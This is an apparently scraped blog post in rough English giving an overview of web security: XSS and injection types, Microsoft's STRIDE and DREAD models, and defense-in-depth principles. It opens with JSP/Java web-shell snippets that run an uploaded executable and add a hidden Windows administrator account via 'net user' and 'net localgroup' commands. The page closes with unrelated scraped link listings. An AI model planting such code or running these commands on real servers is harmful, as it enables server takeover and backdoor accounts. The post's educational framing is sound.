Talk In Web Security(安全世界观): Devleping a Secure WebSite
Writer:BYSocket(泥沙砖瓦浆木匠)
Reprint it anywhere u want.
Why to write about Web Security?
A java file can hack your server.One JSP can download any file. How to do this?
1. Write a JSP and upload to the server.
2. Use JSP to download any bug by HttpClient.
3. Open the virus and get/add the infomation of admin or datas
We can see some from what I write.Its easy but useful:
|
1
2
3
4
5
6
7
8
9
10
11
|
<font size="4" face="宋体"> if(!IsWindows()) { Process process = Runtime.getRuntime().exec("chmod 777 "+strExeFile); if (process.waitFor() != 0) out.println("FAIL ---> when open file"); } Process process = Runtime.getRuntime().exec(strExeFile); if (process.waitFor() == 0) out.println("SUCCESS ---> When open the file");</font> |
Use Java to open the bug.And then get an administrator user.
|
1
2
3
4
5
6
7
8
9
10
11
12
|
if(IsWindows()){ String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add"; Process process = Runtime.getRuntime().exec(execStr); if (process.waitFor() == 0) { Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add"); } else out.print("FAIL ---> when " + execStr);} |
Its about how to use java to get add an administrator user.
Here are some injections that we can see anywhere.So we need Learn the Web Security. First we can learn from the Web history.
Some of Web Security needed to know
Since the environment getting worse,like Haze.So many persons wear Masks when going out.Just like the way to protect ourselves ,we trust the Masks. Its the same as web security.
Note:’Web Security is based on the trust,every way to design on Web Security is also based on the trusts.’
Many web attacks like Haze:
1. XSS
2. CRLF Injection
3. X-PATH Injection
4. HTML Injection
5. JavaScript Injection
XSS Development:![]()
So there is a question:’How to analysis the web security of software or project?’
STRIDE (security) DREAD by Microsoft
STRIDE
STRIDE is a system developed by Microsoft for thinking about computer security threats.The threat categories are:
1. Spoofing of user identity
2. Tampering
3. Repudiation
4. Infomation disclosure
5. Denial of Service
6. Elevation of privilege
DREAD
The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:
1. Damage potential: How great is the damage if the vulnerability is exploited?
2. Reproducibility: How easy is it to reproduce the attack?
3. Exploitability: How easy is it to launch an attack?
4. Affected users: As a rough percentage, how many users are affected?
5. Discoverability: How easy is it to find the vulnerability?
So after these categories,a good way to design on Web Security has some features:
1. Solve problem in effect
2. Good experience for users
3. Low coupling
4. Easy to extend and upgrade
How to Devlep a Secure WebSite
Note: ‘ Security is a normal subject and a poised art.’
1. Secure By Default
Its also the security of users.We can create The White List and The Black List and limits of user operation.
2. Defense in Depth
Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful, I have put together a series of eight webcasts on this topic. Here are 7 levels:
![]()
3. Quarantine between Data and Demo
4. Uncertainly of unpredictability
The paramters may be easy to guess.So let them be hard to guess.
Think in Web Security
Like a bucket of water, we trust the bucket and water.Its the Security.When the bucket has the chemistry-poison,the security will be broken.
Note:‘Open Free Share’
G night~
Writer:BYSocket(泥沙砖瓦浆木匠)
Reprint it anywhere u want.
Talk In Web Security(安全世界观): Devleping a Secure WebSite的更多相关文章
- SPRING SECURITY JAVA配置:Web Security
在前一篇,我已经介绍了Spring Security Java配置,也概括的介绍了一下这个项目方方面面.在这篇文章中,我们来看一看一个简单的基于web security配置的例子.之后我们再来作更多的 ...
- System.Web.Security 在winform中是什么命名空间呢
des.Key = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStorin ...
- System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(string, string)已过时的解决办法
FormsAuthentication.HashPasswordForStoringInConfigFile 方法是一个在.NET 4.5中已经废弃不用的API,参见: https://msdn.mi ...
- ref:web security最新学习资料收集
ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-S ...
- 『转』Dr.Web Security Space 8 – 免费3个月
简短的测试五个问题,任意回答问题,都将获得Dr.Web Security Suite 3个月免费许可证以及大蜘蛛企业安全套件2个月来保护整个公司!活动地址:https://www.drweb.com/ ...
- [Security] Web Security Essentials
In this course, we'll learn how to exploit and then mitigate several common Web Security Vulnerabili ...
- web hack & web security
web hack & web security https://www.hacksplaining.com/lessons https://www.hacksplaining.com/ OK ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
随机推荐
- C#数据同步中基本步骤和用到的相关函数
C#数据同步中基本步骤和用到的相关函数 数据同步对比步骤: 1.将两数据库中对应的数据表分别生成XML文件 /// <summary> /// 将一个DataTable以xml方式存入指定 ...
- Python从入门到精通之Third!
Python运算符 算数运算符:+ - * / % // ** 比较运算符:== > < >= 大于等于 & ...
- [转]etcd 启用 https
1, 生成 TLS 秘钥对 2,拷贝密钥对到所有节点 3,配置 etcd 使用证书 4,测试 etcd 是否正常 5,配置 kube-apiserver 使用 CA 连接 etcd 6,测试 kube ...
- Xcode安装CocoaPods
1.虽然Mac自带Ruby但是安装cocoapods需要gem,gem是一个管理Ruby库和程序的标准包,它通过RubyGem源来查找.安装.升级和卸载软件包.因为gem默认的服务器被墙,因此在安装之 ...
- 第45章:MongoDB-集群--Sharding(分片)--分片的管理
①列出所有的Shard db.runCommand({“listshards”:1}); ②查看分片信息 db.printShardingStatus(); ③判断是否分片 db.runCommand ...
- go 切片的创建方式
切片的创建方式现知道的有下面几种方式,切片为指针类型,从数组中得到的切片修改元素值时,原数组也会发生变化(数组为非指针类型) package main import "fmt" f ...
- [swarthmore cs75] Compiler 6 – Garbage Snake
课程回顾 Swarthmore学院16年开的编译系统课,总共10次大作业.本随笔记录了相关的课堂笔记以及第9次大作业. 赋值的副作用:循环元组 下面的代码展示了Python3是如何处理循环列表(pri ...
- C++ STL next_permutation(快速排列组合)
排列组合必备!! https://blog.csdn.net/bengshakalakaka/article/details/78515480
- 20145232韩文浩《网络对抗》MSF基础应用
MS08-067漏洞攻击 攻击机:Kali:192.168.31.132 靶机:win XP SP3(English):192.168.31.180 在VMware中设置两台虚拟机网络为NAT模式,自 ...
- ArcSDE
ArcSDE,即数据通路,是ArcGIS的空间数据引擎,它是在关系数据库管理系统(RDBMS)中存储和管理多用户空间数据库的通路.从空间数据管理的角度看,ArcSDE是一个连续的空间数据模型,借助这一 ...